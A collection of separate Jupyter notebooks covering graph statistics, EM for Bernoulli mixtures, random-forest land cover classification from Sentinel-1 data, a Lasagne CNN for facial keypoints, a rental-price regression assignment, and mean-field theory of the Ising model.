plt.gcf().set_size_inches(11, 8)
```
The average degree of the nearest neighbours as a function of the degree is:
```
knn = Karate.neighbour_degree_function()
```
Which we plot as well
```
plt.plot(knn.T[0], knn.T[1])
plt.xlabel('k')
plt.ylabel(r'$\langle K_{nn}[k] \rangle$')
plt.gcf().set_size_inches(11, 8)
```
Finally, before we proceed to the next nodebook, we save the current state of our Graph class. For this we use some Jupyter Notebook magic. It's not important to understand this, but you can read about it in the [Jupyter notebook](https://jupyter-notebook.readthedocs.io/en/stable/examples/Notebook/Importing%20Notebooks.html) documentation.
```
def export_class(path, filename):
import io
from nbformat import read
with io.open(path, 'r', encoding='utf-8') as f:
nb = read(f, 4)
fp = open(filename, "wt")
for cell in nb.cells:
if cell.cell_type == 'code':
first_line = cell.source.split('\n')[0]
if "class " in first_line or "add_method" in first_line:
print(cell.source, file=fp)
print("\n", file=fp)
elif "import" in first_line:
for line in cell.source.split('\n'):
if not line.startswith("%"):
print(line.strip(), file=fp)
print("\n", file=fp)
fp.close()
```
Suffice it to say, that after this line, we'll have a Python module called "Graph.py" containing all the methors in our Graph class
```
export_class('2. Graph Properties.ipynb', 'Graph.py')
```
<div style="width: 100%; overflow: hidden;">
<img src="data/D4Sci_logo_full.png" alt="Data For Science, Inc" align="center" border="0" width=300px>
</div>
| github_jupyter |
# Session 13: Mixtures of Bernoulli distributions
------------------------------------------------------
*Introduction to Data Science & Machine Learning*
*Pablo M. Olmos olmos@tsc.uc3m.es*
------------------------------------------------------
In this notebook we will implement the EM algorithm for mixtures of Bernoulli distributions. This model is also known as [*latent class analysis*](https://en.wikipedia.org/wiki/Latent_class_model). As well as being of practical importance on its own right, understading this model and its learning also lay the fundation for **hidden Markov models (HMMs)** over discrete variables. HMMs will be dicussed in future course sessions.
### Mixtures of Bernoulli distributions
Consider a set of i.i.d. $D$-dimensional binary (0-1) vectors. Examples of this kind of data are binary images, binary detection results, or genetic markers. Consider also a mixture of multinomials (or multivariate Bernoullis) model for each of the vectors, $\mathbf{x}$,
$$\displaystyle p(\mathbf{x} | \boldsymbol{\Theta},\mathbf{\pi} ) = \sum_{k=1}^K \pi_k p_k(\mathbf{x}^{(i)}|\boldsymbol{\theta}_k) = \sum_{k=1}^K \pi_k \prod_{j=1}^D \theta_{jk}^{x_{j}} (1-\theta_{jk})^{1-x_{j}},$$
where $\boldsymbol{\Theta}=[\boldsymbol{\theta}_1,\ldots,\boldsymbol{\theta}_K]$. If we are given a data set $\mathbf{X}=\{\mathbf{x}^{(1)},\ldots,\mathbf{x}^{(N)}\}$ then the log likelihood function for this model is given by
\begin{align}
\log p(\mathbf{X}|\boldsymbol{\Theta},\mathbf{\pi}) = \sum_{i=1}^N \log\left(\sum_{k=1}^D \pi_k p(\mathbf{x}^{(i)}|\boldsymbol{\theta}_k)\right)
\end{align}
To prevent overfitting, we will also use a **prior distribution** for the model parameters. For $\boldsymbol{\Theta}$ we have
\begin{align}
\theta_{jk}&\sim\text{Beta}(\alpha,\beta)\\
p(\boldsymbol{\Theta}) &= \prod_{k=1}^{K} \prod_{j=1}^D p(\theta_{jk})\\
p(\theta_{jk}) &= \frac{\theta_{jk}^{\alpha-1}(1-\theta_{jk})^{\beta-1}}{\text{B}(\alpha,\beta)},
\end{align}
where $\text{B}(\alpha,\beta)$ is the [Beta function](https://en.wikipedia.org/wiki/Beta_function). Check [here](https://en.wikipedia.org/wiki/Beta_distribution) for more details about the Beta distribution.
For $\mathbf{\pi}$ we use a uniform [Dirichlet distribution](https://en.wikipedia.org/wiki/Dirichlet_distribution):
\begin{align}
\mathbf{\pi}&\sim \text{Dir}(\frac{1}{K}, \ldots, \frac{1}{K}) \Rightarrow p(\mathbf{\pi}) =\frac{1}{\text{B}(\frac{1}{K}, \ldots, \frac{1}{K})}\prod_{k=1}^{K}\pi_k^{\frac{1}{K}-1},
\end{align}
where $\text{B}(\frac{1}{K}, \ldots, \frac{1}{K})$ is the multivariate Beta function.
### EM learning
We now derive the EM algorithm for maximizing the posterior distribution $p(\mathbf{\Theta},\mathbf{\pi}|\mathbf{X})$. To do this, we introduce an explict discrete latent variable $z\in\{1,\ldots,K\}$ assoacted to each data point $\mathbf{x}$:
\begin{align}
p(\mathbf{x},z) = \prod_{k=1}^{K} \left(\pi_k ~p_{k}(\mathbf{x})\right)^{\mathbb{1} [z==k]}, ~~ p(z)=\prod_{k=1}^K \pi_k^{\mathbb{1} [z==k]}
\end{align}
#### Complete log-likelihood
We write the complete data log-likelihood as follows:
\begin{align}
\log p(\mathbf{X},\mathbf{z}|\boldsymbol{\Theta},\mathbf{\pi})=\sum_{i=1}^{N}\sum_{k=1}^{K}\mathbb{1} [z^{(i)}==k]\left(\log \pi_k + \sum_{j=1}^D \left[x_{j}^{(i)}\log\theta_k+(1-x_{j}^{(i)})\log(1-\theta_k)\right]\right)
\end{align}
#### Posterior distribution of $\mathbf{z}$ given $\boldsymbol{\Theta},\mathbf{\pi}$
In the $E$, we compute the expected complete data log-likelihood w.r.t. posterior distribution of $\mathbf{z}$ given the current values of $\boldsymbol{\Theta},\mathbf{\pi}$:
\begin{align}
p(z^{(i)}=k|\mathbf{x}^{(i)},\boldsymbol{\Theta}_{(t-1)},\mathbf{\pi}_{(t-1)}) \triangleq r_{ik} = \frac{\pi_{(k,t-1)} p_k(\mathbf{x}|\boldsymbol{\theta}_k) }{\sum_{q=1}^K \pi_{(q,t-1)} p_k(\mathbf{x}^{(i)}|\boldsymbol{\theta}_q)}, ~~~ k=1,\ldots, K
\end{align}
#### E-step
It is easy to show that
\begin{align}
\mathcal{Q}(\boldsymbol{\Theta},\mathbf{\pi},\boldsymbol{\Theta}_{(t-1)},\mathbf{\pi}_{(t-1)})&=\mathbb{E}_{p(\mathbf{z}|\mathbf{X}^{(i)},\boldsymbol{\Theta}_{(t-1)},\mathbf{\pi}_{(t-1)})}[\log p(\mathbf{X},\mathbf{z}|\boldsymbol{\Theta},\mathbf{\pi})]\\
&=\sum_{i=1}^{N}\sum_{k=1}^K r_{ik} \left(\log \pi_k + \sum_{j=1}^D \left[x_{j}^{(i)}\log\theta_k+(1-x_{j}^{(i)})\log(1-\theta_k)\right]\right)
\end{align}
#### M-step
We have to find
\begin{align}
\boldsymbol{\Theta}_t,\mathbf{\pi}_t = \arg \max_{\boldsymbol{\Theta},\mathbf{\pi}} ~~\mathcal{Q}(\boldsymbol{\Theta},\mathbf{\pi},\boldsymbol{\Theta}_{(t-1)},\mathbf{\pi}_{(t-1)})+ \log p(\boldsymbol{\Theta})+\log p(\mathbf{\pi})
\end{align}
As a result, one can prove that the maximum is attained at
\begin{align}
r_k &\triangleq \sum_{i=1}^N r_{ik} \\\\
\pi^t_k &= \frac{r_k+\frac{1}{K}-1}{N+1-K}\\\\
\boldsymbol{\theta}_k &= \frac{\sum_{i=1}^N r_{ik}\mathbf{x}^{(i)}+\alpha-1}{r_k+\alpha+\beta-2}
\end{align}
To see details about the derivation of this result, check out chapter 9 of Bishop's book. Also Chapter 11 of Murphy's book.
## Implementation of the E-step
We first write a Python function that evaluates the responsibilities $r_{ik}$, $i=1,\ldots,N$, $k=1,\ldots,K$ for each data point. It should take as input the current values of $\boldsymbol{\pi}$, $\boldsymbol{\Theta}$, and the matrix $\mathbf{X}$ of observations.
```
import matplotlib.pyplot as plt
import numpy as np
from IPython.display import Image
import matplotlib.mlab as mlab
from mpl_toolkits.mplot3d import Axes3D
%matplotlib inline
# THE FOLLOWING FUNCTION takes the whole matrix of data points and the vector
# of probabilites of a single cluster. The function returns the probability of each data
# point given cluster parameters p(x|theta_k)
def eval_bern_pdf(X,Thetak):
#Your code here
M = np.exp(X*np.log(Thetak)+(1-X)*np.log(1-Thetak))
pmf = np.prod(M,1)
return pmf
# THE FOLLOWING FUNCTION takes the whole matrix of data points, the vector
# of probabilites of a single cluster and the cluster probabilites. The function returns
# the matrix of responsibilites
def responsibilities(X,P,Theta,K):
N,D = X.shape
R = np.zeros([N,K])
for k in range(K):
#Your code here
R[:,k] = eval_bern_pdf(X,Theta[k,:])
R *= P.T
R /= np.sum(R,1).reshape([-1,1])
return R
#Test your code with the following example
N = 2
D = 5
K = 3
np.random.seed(10)
X = np.random.randint(0,2,[N,D])
Theta = np.random.rand(K,D)
print(Theta)
P = np.random.rand(K,1)
P /= np.sum(P)
print(P)
R = responsibilities(X,P,Theta,K)
# R should be a [N,K] matrix with the following values
# [[ 2.20811374e-02 2.19873976e-01 7.58044887e-01]
# [ 7.49839314e-04 3.34167429e-01 6.65082732e-01]]
print(X)
print(R)
```
## Implementation of the M step
```
# COMPLETE THE FOLLOWING FUNCTION, which computes the the soft number of points
# associated to each cluster given the matrix R
def points_cluster(R):
#Your code here
return np.sum(R,0)
# COMPLETE THE FOLLOWING FUNCTION, which updates the value of the cluster probabilites
def new_P(R,N):
#Your code here
Rk = points_cluster(R)
return Rk/N
def new_Theta(R,X,K,alpha,beta):
Theta = np.zeros([K,D])
Rk = points_cluster(R)
for k in range(K):
#Your code here
Theta[k,:] = (np.sum(X*R[:,k].reshape([-1,1]),0)+alpha-1) / (Rk[k]+alpha+beta-2)
return Theta
alpha = 2.
beta = 2.
Theta = new_Theta(R,X,K,alpha,beta)
print(Theta)
# Theta should be a [K,D] matrix with the following values
# [[ 0.50564332 0.50564332 0.49435668 0.50564332 0.49472737]
# [ 0.60846367 0.60846367 0.39153633 0.60846367 0.52237502]
# [ 0.70786949 0.70786949 0.29213051 0.70786949 0.48642146]]
```
## Computing the log-likelihood
```
# COMPLETE THE FOLLOWING FUNCTION, which computes the model log-likelihood
# given the model parameters
def log_lik(X,P,Theta,K):
LL = 0.
for k in range(K):
#Your code here
LL += eval_bern_pdf(X,Theta[k,:])*P[k]
return np.sum(np.log(LL)) #Your code here
#For the toy example the LL should be -5.31111037373
print(log_lik(X,P,Theta,K))
```
## EM for a synthetic dataset
Let's generate samples from a mixtures of Bernoulli distributions and run the EM algorithm to recover the true model parameters.
```
## True model parameters
K = 5
D = 100
N = 5000
X = []
Theta_true = np.random.rand(K,D)
P_true = np.random.rand(K,1)
P_true /= np.sum(P_true)
N_Z_true = np.random.multinomial(N,P_true.reshape([-1,]))
for k in range(K):
X.append(np.random.rand(N_Z_true[k],D)<=Theta_true[k,:])
print(X[k].shape)
X = np.concatenate(X)
## EM initialization
K = 5
P = np.random.rand(K,1)
P /= np.sum(P_true)
Theta = np.ones([K,D])*1.0/K
Num_Iter = 100
alpha = 0.2
beta = 0.2
LL = np.zeros([Num_Iter,1])
for i in range(Num_Iter):
LL[i] = log_lik(X,P,Theta,K)
R = responsibilities(X,P,Theta,K)
P = new_P(R,N)
Theta = new_Theta(R,X,K,alpha,beta)
# Plot the evolution of the negative LL. It should always decrease!
plt.semilogy(-LL,'-*')
plt.plot(P_true,label='true probs', color = [0, 0.5, 0])
plt.plot(P,label='EM probs', color = [1, 0, 0])
plt.legend()
plt.title('Cluster Probabilites')
```
## EM for a data set of handwritten digits
Load and run the EM over the [sklearn dataset of digits](http://scikit-learn.org/stable/modules/generated/sklearn.datasets.load_digits.html#sklearn.datasets.load_digits). Each datapoint is a 8x8 image of a digit.
```
from sklearn.datasets import load_digits
digits = load_digits() #Gray scale, we have to binarize
print(digits.data.shape)
plt.gray()
plt.matshow(digits.images[15])
plt.show()
#Binarization
Bin_Images = np.copy(digits.images)
val_min=np.min(Bin_Images)
val_max=np.max(Bin_Images)
Bin_Images = (Bin_Images - val_min) / (val_max - val_min)
Bin_Images = np.round(Bin_Images)
plt.gray()
plt.matshow(Bin_Images[15])
plt.show()
# EM
K = 10
D = 64
X = Bin_Images.reshape([-1,D])
P = np.random.rand(K,1)
P /= np.sum(P_true)
Theta = np.ones([K,D])*1.0/K
Num_Iter = 1000
alpha = 2.
beta = 2.
LL = np.zeros([Num_Iter,1])
for i in range(Num_Iter):
LL[i] = log_lik(X,P,Theta,K)
R = responsibilities(X,P,Theta,K)
P = new_P(R,N)
Theta = new_Theta(R,X,K,alpha,beta)
# Plot the evolution of the negative LL. It should always decrease!
plt.semilogy(-LL,'-*')
# Plot as a 8x8 gray-scale image each theta_k vector
# (it represents the probability of each pixel to take value 1)
for k in range(K):
plt.gray()
plt.matshow(Theta[k,:].reshape([8,8]))
plt.show()
```
## EM for the MNIST Database (optional)
Repeat the experiment for the MNIST Database. Take $10^4$ images **at random**, and binarize the database.
```
from sklearn.datasets import fetch_mldata
mnist = fetch_mldata('MNIST original')
images = mnist.data #70000 images
plt.gray()
plt.matshow(images[0,:].reshape([28,28]))
plt.show()
val_min=np.min(images)
val_max=np.max(images)
Bin_Images = (images - val_min) / (val_max - val_min)
Bin_Images = np.round(Bin_Images)
plt.gray()
plt.matshow(Bin_Images[0,:].reshape([28,28]))
plt.show()
mask = np.random.permutation(Bin_Images.shape[0])
Bin_Images = Bin_Images[mask,:]
# EM
K = 10
D = 784
N = 1000
X = Bin_Images[:N,:]
P = np.random.rand(K,1)
P /= np.sum(P_true)
Theta = 0.5/K*np.ones([K,D])+0.5*np.random.rand(K,D)
Num_Iter = 1000
alpha = 2.1
beta = 2.1
LL = np.zeros([Num_Iter,1])
for i in range(Num_Iter):
LL[i] = log_lik(X,P,Theta,K)
R = responsibilities(X,P,Theta,K)
P = new_P(R,N)
Theta = new_Theta(R,X,K,alpha,beta)
if(i % 20 ==0):
print('Iteration ',i)
# Plot the evolution of the negative LL. It should always decrease!
plt.plot(-LL,'-*')
# Plot as a 8x8 gray-scale image each theta_k vector
# (it represents the probability of each pixel to take value 1)
for k in range(K):
plt.gray()
plt.matshow(Theta[k,:].reshape([28,28]))
plt.show()
```
| github_jupyter |
# Impressions on the lc_classif python package
## Content
1. Import of Necessary Python Modules
2. Conduct resampling and subsetting of data and mask
3. Import of Data and First Impressions on Classes
4. Analyze and Impute Missing Values
5. Analyze Class Separability
6. Split into Test and Training Dataset
7. Basic Random Forest Model
8. Tuning Base Model
9. Base Model with Feature Selection
# 1. Import of Necessary Python Modules
```
from RanForCorine import geodata_handling as datahandler
from RanForCorine import data_cleaning as clean
from RanForCorine import descriptive_stats as descr
from RanForCorine import separability as sep
from RanForCorine import test_training_separation as tts
from RanForCorine import randomforest_classifier as rf
from RanForCorine import accuracy as acc
from RanForCorine import tuning as tuning
from RanForCorine import feature_importance as feat
from RanForCorine import visualization as vis
import numpy as np
#import osr
```
# 2. Resampling and subsetting of the data
Before starting the selection of the classes and training the random forest model, a preparation of the data might be necessary. The data and land cover mask should have the same extend and resolution. The Sentinel-1 data will then be split into the backscatter values of the classes in a DataFrame.
```
# set the nexessary file paths
fp_stack=r"Path\to\Sentinel1\data"
fp_hdr=r"Path\to\Sentinel1\data.hdr"
fp_mask=r"Path\to\CorineLandCover\mask.tif"
fp_s1_res=r'Path\to\save\resampled\Sentinel1'
fp_mask_sub=r'Path\to\save\subsetted\CLC\mask.tif'
fp_csv=r'Path\to\save\splitted\data.csv'
fp_out=r'Path\to\save\result.tif'
# adjust pixel size and extend of S-1 data and mask
datahandler.adjust(fp_stack,fp_mask, epsg=32633, write=True, outfp1=fp_s1_res,\
outfp2=fp_mask_sub,hdrfp=fp_hdr,subset=False)
# split the Sentinel-1 data into the Corine land Cover classes and return the DataFrame
fp_s1_res=r"D:\Master\Geo419\Projekt\Daten\test\s1_resampled"
fp_mask_sub=r"D:\Master\Geo419\Projekt\Daten\test\clc_mask_clipped"
data_raw=datahandler.split_classes(fp_s1_res,fp_mask_sub)
data_raw.head(10)
```
# 3. First Impressions on Classes
In this section data is imported and first impressions on the dataset are shown. For example there is a barplot showing how many pixels/values there are per class. As it will be seen later on, the amount of pixels has a substantial impact on the class separability.
```
# IMPORT DATA ################################
# data_raw = datahandler.importCSV(r"Path\to\splitted\data.csv").drop(data_raw.columns[0], axis=1) #remove index column
print(data_raw.columns)
# FIRST IMPRESSIONS ##########################
class_count = descr.countPxlsPerClass(data_raw, "Label_nr")
class_count.plot.bar()
```
Furthermore it is possible to plot histograms for selected classes. As shown below for the data of Vattenrike class distributions are very differnt throughout the dataset.
```
# plot histogram
descr.plotHist(data_raw, 211, "Label_nr")
# plot histogram
descr.plotHist(data_raw, 522, "Label_nr")
```
# 4. Analyze and Impute Missing Values
As the Random Forest model used in this package is based on scikit-learn it cannot operate on null values in the data. Before computing the model it is neccessary to get rid of any missing values. The package provides the opportunity to count missing data fields and impute them with the mean of the column where it is located.
```
# MISSING VALUES #############################
print("--- ANALYZING MISSING VALUES ---")
missing_count = clean.countMissingValuesTotal(data_raw, null_value=-99.0)
print(str(missing_count) + " values are missing.")
# Impute missing values with mean in column
%timeit data_imp = clean.imputeMean(data_raw, clean=True, null_value=-99.0)
print("Done imputing missing values.")
```
# 5. Analyze Class Separability
As there are so many classes in the dataset, it is recommended to analyze their separability. For this purpose three different distance measures can be calculated. In this example the euclidean distance is shown in a heatmap clearly visualizing the best separable classes.
```
# CLASS SEPARABILITY ##########################
print("--- ANALYZING CLASS SEPARABILITY ---")
class_sep = sep.calcSep(data_imp, "Label_nr")
sep.printHeatmap(class_sep, "Euclidean")
```
To use only those classes for the model it is neccessary to compress all remaining classes to one class. The plot shows that now there are approximately 15,000 pixels of the class 0.
```
# we decided to use following classes
sep_list = [112,211,231,311,312,523,512]
# add column to dataset setting all unwanted class values to 0
data_comp = clean.compressClasses(data_imp, sep_list, "Label_nr", "Label_new")
# count number of pixels per class
class_count_comp = descr.countPxlsPerClass(data_comp, "Label_new")
class_count_comp.plot.bar()
# plot histogram
descr.plotHist(data_comp, 0, "Label_new")
```
A new separability analysis compares the remaining classes.
```
# show new separability
class_sep2 = sep.calcSep(data_comp, "Label_new")
sep.printHeatmap(class_sep2, "Euclidean")
```
# 6. Split into Test and Training Dataset
In this step the images are split into test and training dataset. Whereas the training dataset needs to be larger and is used to train the model, the test dataset will be used to predict class values. Class labels are split into test and training datasets as well.
As this package should be used with image classification, the test dataset is always the upper proportion of the image. In this example we used a proportion of 0.3 for the testsize. So the upper 30 % of the images are used for testing or rather prediction. The lower 70 % are used to train the model.
```
# TEST TRAINING #################################
print("--- Test Training Split ---")
x_train, x_test, y_train, y_test = tts.imageSplit(data_comp, labelcol="Label_new", imagedim=[455,423], testsize=0.3)
```
# 7. Basic Random Forest Model
Now it is time for the basic Random Forest (RF) model. To keep computing time possibly low we decided to go with low max_depth and n_estimator values which results into a model that is not a powerful as it could be.
The model is fitted to the training data. Afterwards, the prediction is carried out.
```
# RANDOM FOREST BASE MODEL ######################
print("--- CALCULATING BASE MODEL ---")
base_model = rf.RandomForestClassifier(max_depth=2, random_state=1, n_estimators=50)
rf.fitModel(base_model, x_train, y_train)
print("--- DONE FITTING MODEL ---")
base_pred = rf.predictModel(base_model, x_test)
print("--- DONE PREDICTING ---")
```
Now accuracy score and confusion matrix are printed.
```
# ACCURACY
base_acc = acc.getAccuracy(base_pred, y_test)
print("Base model has accuracy of: " + str(base_acc))
base_conf = acc.getConfMatrix(base_pred, y_test)
classes = [0, 112, 211, 231, 311, 312, 512, 523]
acc.printConfMatrix(base_conf, classes)
```
The predicted image shows that only a few classes could be classified with this model.
```
vis.plotResult(base_pred, [127, 455])
```
# 8. Tuning Base Model
As it is impossible to find the right combination of parameters for a complex RF model it is recommended to use hyperparameter tuning. The best setting is tried to be found using a three-fold cross-validation over a grid of possible parameter values. This clearly shows an improvement in accuracy.
```
# BASE MODEL TUNING
print("--- TUNING BASE MODEL ---")
base_params = tuning.getParamsOfModel(base_model)
print(base_params)
max_depth_base = [int(x) for x in np.linspace(10, 110, num = 5)]
max_depth_base.append(None)
base_grid = {'n_estimators': [int(x) for x in np.linspace(start = 50, stop = 200, num = 5)],
'max_features': ['auto', 'sqrt'],
'max_depth': max_depth_base}
best_base_model = tuning.tuneModel(base_grid, x_train, y_train, n_jobs=1)
best_base_pred = rf.predictModel(best_base_model, x_test)
best_base_acc = acc.getAccuracy(best_base_pred, y_test)
print("Tuned base model has accuracy of: " + str(best_base_acc))
best_base_acc = acc.getAccuracy(best_base_pred, y_test)
print("Tuned base model has accuracy of: " + str(best_base_acc))
best_base_conf = acc.getConfMatrix(best_base_pred, y_test)
classes = [0, 112, 211, 231, 311, 312, 512, 532] #list here the class numbers in ascending order
acc.printConfMatrix(best_base_conf, classes)
params=tuning.getParamsOfModel(best_base_model)
print(params)
```
As it can be seen in the plotted result all classes could be predicted.
```
vis.plotResult(best_base_pred, [127, 455])
```
# 9. Base Model with Feature Selection
In addition to tuning it is possible to use feature selection. As we got more than 200 features or rather images in this dataset the plot shows the 10 most important ones.
```
feat.importancePlot(base_model, x_train.columns, 10)
```
Based on those important features it is possible to carry out a new classification by training a new model. This slightly improves the base model.
```
# select important features
x_important_test, x_important_train = feat.selectImportantFeatures(base_model, x_train, y_train, x_test)
sel_model = rf.RandomForestClassifier(max_depth=2, random_state=1, n_estimators=50)
rf.fitModel(sel_model, x_important_train, y_train)
sel_pred = rf.predictModel(sel_model, x_important_test)
sel_acc = acc.getAccuracy(sel_pred, y_test)
print("Model with selected features as accuracy of: " + str(sel_acc)) #0.67
sel_pred_conf = acc.getConfMatrix(sel_pred, y_test)
classes = [0, 112, 211, 231, 311, 312, 512, 532] #list here the class numbers in ascending order
acc.printConfMatrix(sel_pred_conf, classes)
vis.plotResult(best_base_pred, [127, 455])
# save the result to disk as GeoTIFF"
ds=datahandler.read_file_gdal(fp_s1_res)
gt=ds.GetGeoTransform()
srs=osr.SpatialReference()
srs.ImportFromWkt(ds.GetProjection())
sel_pred=sel_pred.reshape((127, 455))
datahandler.create_gtiff(sel_pred,gt,srs,r"D:\Master\Geo419\Projekt\Daten\test\sel_pred_VH.tif")
best_base_pred=best_base_pred.reshape((127, 455))
datahandler.create_gtiff(best_base_pred,gt,srs,r"D:\Master\Geo419\Projekt\Daten\test\best_base_pred_VH.tif")
base_pred=base_pred.reshape((127, 455))
datahandler.create_gtiff(base_pred,gt,srs,r"D:\Master\Geo419\Projekt\Daten\test\base_pred_VH.tif")
```
| github_jupyter |
```
# import modules
%matplotlib inline
import os
import pylab as plt
import cPickle as pkl
import numpy as np
import pandas as pd
from theano import *
from sklearn.utils import shuffle
from lasagne import layers, updates, nonlinearities
from nolearn.lasagne import NeuralNet, BatchIterator, visualize
FTRAIN = '../data/misc/face_data/training.csv'
FTEST = '../data/misc/face_data/test.csv'
model_root= '../models'
# Load train and test set
def load(test=False, cols=None):
fname = FTEST if test else FTRAIN
df = pd.read_csv(os.path.expanduser(fname))
# The Image column has pixel values separated by space; convert
# the values to numpy arrays:
df['Image'] = df['Image'].apply(lambda im: np.fromstring(im, sep=' '))
if cols: # get a subset of columns
df = df[list(cols) + ['Image']]
#print(df.count()) # prints the number of values for each column
df = df.dropna() # drop all rows that have missing values in them
X = np.vstack(df['Image'].values) / 255. # scale pixel values to [0, 1]
X = X.astype(np.float32)
if not test: # only FTRAIN has any target columns
y = df[df.columns[:-1]].values
y = (y - 48) / 48 # scale target coordinates to [-1, 1]
X, y = shuffle(X, y, random_state=42) # shuffle train data
y = y.astype(np.float32)
else:
y = None
return X, y
#vis it
def load2d(test=False, cols=None):
X, y = load(test=test)
X = X.reshape(-1, 1, 96, 96)
return X, y
#network architecture
net = NeuralNet(
layers=[
('input', layers.InputLayer),
('conv1', layers.Conv2DLayer),
('pool1', layers.MaxPool2DLayer),
('conv2', layers.Conv2DLayer),
('pool2', layers.MaxPool2DLayer),
('conv3', layers.Conv2DLayer),
('pool3', layers.MaxPool2DLayer),
('output', layers.DenseLayer),
],
input_shape=(None, 1, 96, 96),
conv1_num_filters=32, conv1_filter_size=(5, 5),
pool1_pool_size=(3, 3),
conv2_num_filters=64, conv2_filter_size=(5, 5),
pool2_pool_size=(3, 3),
conv3_num_filters=128, conv3_filter_size=(5, 5),
pool3_pool_size=(3, 3),
output_num_units=30, output_nonlinearity=None,
update=updates.adam,
regression=True,
max_epochs=100,
verbose=1,
)
#Training
X, y = load2d();
net.fit(X, y);
#save model
with open(os.path.join(model_root, 'toy_localizer.pkl'), 'wb') as f:
pkl.dump(net, f, -1)
f.close()
#load model
with open(os.path.join(model_root, 'toy_localizer.pkl'), 'rb') as f:
net = pkl.load(f)
f.close()
#prediction results
def plot_sample(x, y, axis):
img = x.reshape(96, 96)
axis.imshow(img, cmap='gray')
axis.scatter(y[0::2] * 48 + 48, y[1::2] * 48 + 48, marker='x', s=10)
X, _ = load2d(test=True)
y_pred = net.predict(X)
fig = plt.figure(figsize=(6, 6))
fig.subplots_adjust(
left=0, right=1, bottom=0, top=1, hspace=0.05, wspace=0.05)
for i in range(16):
ax = fig.add_subplot(4, 4, i + 1, xticks=[], yticks=[])
plot_sample(X[i], y_pred[i], ax)
plt.show()
#visualize first layer weights
visualize.plot_conv_weights(net.layers_['conv1'])
#visualize first layer weights
visualize.plot_conv_activity(net.layers_['conv1'], X[i:i+1, :, :, :])
```
| github_jupyter |
Lambda School Data Science, Unit 2: Predictive Modeling
# Regression & Classification, Module 1
## Assignment
You'll use another **New York City** real estate dataset.
But now you'll **predict how much it costs to rent an apartment**, instead of how much it costs to buy a condo.
The data comes from renthop.com, an apartment listing website.
- [ ] Look at the data. What's the distribution of the target, `price`, and features such as `longitude` and `latitude`? Remove outliers.
- [ ] After you remove outliers, what is the mean price in your subset of the data?
- [ ] Choose a feature, and plot its relationship with the target.
- [ ] Use scikit-learn for linear regression with one feature. You can follow the [5-step process from Jake VanderPlas](https://jakevdp.github.io/PythonDataScienceHandbook/05.02-introducing-scikit-learn.html#Basics-of-the-API).
- [ ] Define a function to make new predictions and explain the model coefficient.
- [ ] Organize and comment your code.
> [Do Not Copy-Paste.](https://docs.google.com/document/d/1ubOw9B3Hfip27hF2ZFnW3a3z9xAgrUDRReOEo-FHCVs/edit) You must type each of these exercises in, manually. If you copy and paste, you might as well not even do them. The point of these exercises is to train your hands, your brain, and your mind in how to read, write, and see code. If you copy-paste, you are cheating yourself out of the effectiveness of the lessons.
## Stretch Goals
- [ ] Do linear regression with two or more features.
- [ ] Read [The Discovery of Statistical Regression](https://priceonomics.com/the-discovery-of-statistical-regression/)
- [ ] Read [_An Introduction to Statistical Learning_](http://faculty.marshall.usc.edu/gareth-james/ISL/ISLR%20Seventh%20Printing.pdf), Chapter 2.1: What Is Statistical Learning?
```
import os, sys
in_colab = 'google.colab' in sys.modules
# If you're in Colab...
if in_colab:
# Pull files from Github repo
os.chdir('/content')
!git init .
!git remote add origin https://github.com/LambdaSchool/DS-Unit-2-Regression-Classification.git
!git pull origin master
# Install required python packages
!pip install -r requirements.txt
# Change into directory for module
os.chdir('module1')
# Ignore this Numpy warning when using Plotly Express:
# FutureWarning: Method .ptp is deprecated and will be removed in a future version. Use numpy.ptp instead.
import warnings
warnings.filterwarnings(action='ignore', category=FutureWarning, module='numpy')
# Read New York City apartment rental listing data
import pandas as pd
df = pd.read_csv('../data/renthop-nyc.csv')
assert df.shape == (49352, 34)
```
| github_jupyter |
# Mean Field Theory
## Essence of Mean Field Approximation (MFA): replacing fluctuating terms by averages
Let us assume that each spin i independently of each other feels some average effect of a field:
$$H_i = -J\sum_{\delta} s_i s_{i+\delta} - h s_i = -\Big(J\sum_{\delta}s_{\delta} +h \Big) s_i$$
Each spin is experiencing a local field defined by its nearest neighours.
$$H_i = J\sum_{\delta}s_{\delta}+h$$
$$H^{eff}=\sum H_i s_i$$
> The difficulty with effective field is that $H_i$ depends on the instatnaous states of neighbouring spins of $s_i$ which flucutuate
We now make a dramaic approximations: replace the effective field by its mean field approximation where each spin is experiencing a field independent of others. The average magnetiszation per spin due to trasnlational invariance is same for every spin (in perioid cboundary conditions that is)
$$H^{MFA}_i = \langle H_i \rangle = J\sum_{\delta} \langle s_{\delta} \rangle+h = Jzm+h$$
- z=4 for 2D lattice
- z=6 for 3D lattice
**In MFA hamitlonian factors out into additive components**
Just like the exact case we had with J=0.
$$\boxed{m = tanh(\beta(Jzm+h))}$$
**The $h=0$ MFA case**
The equation can be solved in a self-consistent manner or graphically by finding intersection between:
- $m =tanh(x)$
- $x = \beta Jzm$
When the slope is equal to one it provides a dividing line between two behaviours.
$$k_B T_c =zJ$$
$$m = tanh \Big(\frac{Tc}{T} m \Big)$$
> **MFA shows phase transitio for 1D Ising model at finite $T=T_c$!**
```
import holoviews as hv
import ipywidgets as widgets
from ipywidgets import interact
import matplotlib.pyplot as plt
import numpy as np
import scipy as sp
@widgets.interact(T=(0.1,5), Tc=(0.1,5))
def mfa_ising1d_plot(T=1, Tc=1):
x = np.linspace(-3,3,1000)
f = lambda x: (T/Tc)*x
m = lambda x: np.tanh(x)
plt.plot(x,m(x), lw=3, alpha=0.9, color='green')
plt.plot(x,f(x),'--',color='black')
idx = np.argwhere(np.diff(np.sign(m(x) - f(x))))
plt.plot(x[idx], f(x)[idx], 'ro')
plt.legend(['m=tanh(x)', 'x'])
plt.ylim(-2,2)
plt.grid('True')
plt.xlabel('m',fontsize=16)
plt.ylabel(r'$tanh (\frac{Tc}{T} m )$',fontsize=16)
@widgets.interact(Tc_T=(0.1,5))
def mfa_ising1d_plot(Tc_T=1):
x = np.linspace(-1,1,200)
h = lambda x: np.arctanh(x) - Tc_T*x
plt.plot(h(x),x, lw=3, alpha=0.9, color='green')
plt.plot(x, np.zeros_like(x), lw=1, color='black')
plt.plot(np.zeros_like(x), x, lw=1, color='black')
plt.grid(True)
plt.ylabel('m',fontsize=16)
plt.xlabel('h',fontsize=16)
plt.ylim([-1,1])
plt.xlim([-1,1])
```
### Critical exponents
**A signature of phase transitions and critical phenomena is that there are universal power law behaviours near critical point**
$$m \sim |T-T_c |^{\beta}$$
$$c \sim |T-T_c|^{-\alpha}$$
$$\chi =\frac{\partial m}{\partial B} \sim |T-T_c|^{-\gamma}$$
**Correlation lengths $\xi$ diverge at critical points**
